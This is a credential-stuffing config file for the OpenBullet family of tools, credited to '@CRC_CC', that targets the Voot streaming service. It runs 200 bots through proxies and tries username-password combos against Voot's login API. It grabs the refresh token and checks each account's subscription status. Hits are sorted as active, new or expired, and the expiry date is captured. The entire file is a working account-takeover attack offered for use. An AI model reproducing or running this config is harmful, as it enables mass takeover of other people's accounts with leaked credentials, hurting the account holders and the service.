[SETTINGS]
{
  "Name": "voot",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2022-06-01T05:47:22.6094802+00:00",
  "AdditionalInfo": "",
  "Author": "@CRC_CC",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://userauth.voot.com/usersV3/v3/login" 
  CONTENT "{\"data\":{\"email\":\"<USER>\",\"password\":\"<PASS>\"},\"deviceBrand\":\"Google\",\"deviceId\":\"e449e4653fcac47f\",\"type\":\"Traditional\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Content-Version: V4" 
  HEADER "usertype: avod" 
  HEADER "Content-Type: application/json; charset=UTF-8" 
  HEADER "Host: userauth.voot.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 
  HEADER "User-Agent: okhttp/3.12.8" 

PARSE "<SOURCE>" LR "refreshToken\":\"" "\"" -> VAR "tk" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "data\":{\"uId\":\"" 
  KEYCHAIN Success OR 
    KEY "data\":{\"uId\":\"" 

REQUEST GET "https://pxapi.voot.com/smsv4/int/ps/v1/voot/user/entitlement/status" 
  
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Encoding: gzip, deflate," 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "accesstoken: <tk>" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: pxapi.voot.com" 
  HEADER "Origin: https://www.voot.com" 
  HEADER "Referer: https://www.voot.com/" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66" 

KEYCHECK 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "status\":\"new" 
    KEY "status\":\"expired" 
  KEYCHAIN Success OR 
    KEY "status\":\"active" 

PARSE "<SOURCE>" LR "timeStamp\":" "," -> VAR "Ex" 

FUNCTION UnixTimeToDate "dd-MM-yyyy" -> CAP "Expiry" 

FUNCTION Constant "@CRC_CC" -> CAP "CONFIG BY:" 

